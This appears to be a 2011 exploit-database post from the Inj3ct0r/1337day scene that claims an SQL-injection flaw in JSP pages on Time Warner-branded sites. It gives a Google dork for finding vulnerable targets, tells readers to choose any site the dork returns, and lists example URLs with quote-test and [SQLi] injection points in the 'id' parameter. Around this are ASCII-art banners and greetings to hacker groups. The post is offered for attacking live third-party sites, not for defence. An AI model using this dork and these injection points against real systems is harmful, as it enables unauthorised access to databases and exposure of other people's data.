#(+)Exploit Title: Time Warner Company Sensitive Database Disclosure Vulnerability #(+)Author : ^Xecuti0n3r #(+) Date : 18.6.2011 #(+) Hour : 13:37 PM #(+) E-mail : xecuti0n3r()yahoo.com #(+) dork : intext:"A Time Warner Company" filetype:jsp inurl:"?id=" #(+) Category : Web Apps [WAF Evasive SQli] 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork intext: intext:"A Time Warner Company" filetype:jsp inurl:"?id=" in search engine *SQL injection Vulnerability* # [+]http://site.com/compare_2009.jsp?id='11439 # [+]http://site.com/compare_2009.jsp?id=[SQLi] # [+]http://site.com/viewarticle.jsp?id='541846 # [+]http://site.com/viewarticle.jsp?id=[SQLi] ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0N3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r (+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :) (+)<3 to :Indian Cyber Army & Indishell Crew (+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com ########################################################################